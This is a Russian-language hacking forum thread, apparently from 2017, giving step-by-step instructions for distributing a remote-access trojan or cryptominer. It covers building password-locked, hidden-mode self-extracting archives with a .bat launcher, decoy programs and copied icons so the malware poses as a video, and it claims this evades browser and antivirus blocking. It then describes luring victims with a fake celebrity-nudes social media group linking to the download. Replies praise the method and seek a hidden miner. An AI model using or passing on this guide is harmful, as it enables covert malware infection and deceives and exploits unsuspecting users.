Способ распространения майнера/ратника

Тема в разделе "Социальная инженерия", создана пользователем Dusimp, 12 дек 2017.

  1. С SFX давно все знают, но тут не большая хитрость.
    Для начала нам нужно 2-3 файла. Первый файл- вирус, Второй файл- .bat и Третий файл по желанию- либо картинка, либо программа, которая будет запускаться вместе с вирусом.

    1) Сначала нужно создать вирус под паролем.

    Добавить вирус в архив.

    Общие:

    1) Метод сжатия максимальный
    2) Поставить галочку напротив пункта "создать SFX-архив"
    3) Поставить галочку напротив пункта "создать непрерывный архив"
    4) Поставить галочку напротив пункта "заблокировать архив"

    Дополнительно: Параметры SFX:

    1) Общие: C:\Program Files\Games (К примеру)
    2) Установка: выполнить после распаковки: имя_вируса.exe
    3) Режимы: скрыть всё.
    4) Обновление: Ставим галочки напротив пунктов: "Извлечь и обновить файлы" и "Перезаписывать все файлы без запроса" (т.е. галочки напротив двух пунктов "2")
    Общие:

    1)Установить пароль (возьмём пароль: 123)
    В итоге получаем файл: имя_вируса.sfx.exe
    2) Создаём блокнот. Прописываем туда эту команду:
    имя_вируса.sfx.exe -p123 -dc:\program files\games

    И сохраняем как .bat файл.

    Это нужно для автоматического открытия вируса без ввода пароля.

    3) Выделяем вирус, .bat файл и внешнюю программу (т.е. программу, которая нужна какому-либо пользователю- в основном безобидная) (или картинку, в зависимости что нужно жертве) создаём архив.

    Общие:

    1) Метод сжатия максимальный
    2) Поставить галочку напротив пункта "создать SFX-архив"
    3) Поставить галочку напротив пункта "создать непрерывный архив"
    4) Поставить галочку напротив пункта "заблокировать архив"

    Дополнительно: Параметры SFX:

    1) Общие: C:\Program Files\Games (К примеру)
    2) Установка: выполнить после распаковки: имя_файла.bat
    выполнить до распаковки: внешняя_программа.exe
    3) Режимы: скрыть всё.
    4) Обновление: Ставим галочки напротив пунктов: "Извлечь и обновить файлы" и "Перезаписывать все файлы без запроса" (т.е. галочки напротив двух пунктов "2")
    5) Текст и графика: Загрузить значок SFX из файла.
    (Если вам нужен значок именно определённой программы, можете открыть архив данной программы через 7-zip. Далее просто ищите файл .ico и просто загружаем этот значок в Тексте и Графике.

    Дальше делаем практически тоже самое:


    Добавляем в архив картинку и вирус:

    Общие:

    1) Метод сжатия максимальный

    2) Поставить галочку напротив пункта "создать SFX-архив"

    Дополнительно: Параметры SFX:

    1) Общие: C:\Program Files\Games (К примеру)

    2) Установка: выполнить после распаковки: имя_картинки.avi (и в этом же окне через Enter вписываем) имя_вируса.exe

    3) Режимы: скрыть всё.

    4) Обновление: Ставим галочки напротив пунктов: "Извлечь и обновить файлы" и "Перезаписывать все файлы без запроса" (т.е. галочки напротив двух пунктов "2")

    5) Текст и графика: Загрузить значок из SFX-файла и вставляете .ico файл.

    В итоге получаем ратник в виде видео файла.

    Чтобы так сделать, нужно скачать Neanderthal, либо Unicodeinput. (ссылка будет ниже)
    Такие манипуляции на позволят заливать файлы архивы на яд без каких либо паролей + хром с дифендером не блокирует.

    С этим закончили. Теперь сама суть по полкам:
    Саздаем паблик вк с названием по типу голые знаменитости/стримерша карина приват/Бузова слив приватно фото и видео ну и т.п на что хватит фантазии.
    В интернете ищем фейк, а где то может и не фейк фото наших знаменитостей в обнаженке (благо этого говна валом) и постим 3 поста в группу. В описании группы пишем что типо того - контакт блокирует материал данного формата, полную коллекцию на эту шкуру вы можете скачать с яндекс диска - ссылка на скачку.
    Последние данные очков репутации:
    anar66: 5 Очки (Годная статья) 13 дек 2017
     
  2. Годно
     
  3. А где ссылка на скачивание софта? Метод знакомы но видимо допиленный малость.
     
  4. Способ не новый. Сказал бы универсальный. ;)
    Главное надежда, а остальное все так ...
     
  5. Есть у кого соображения где майнер достать который в скрытом режиме будет подгружаться на основе данного метода. Есть соображение как распространить.
     
  6. Старая школа уже.
     

Поделиться этой страницей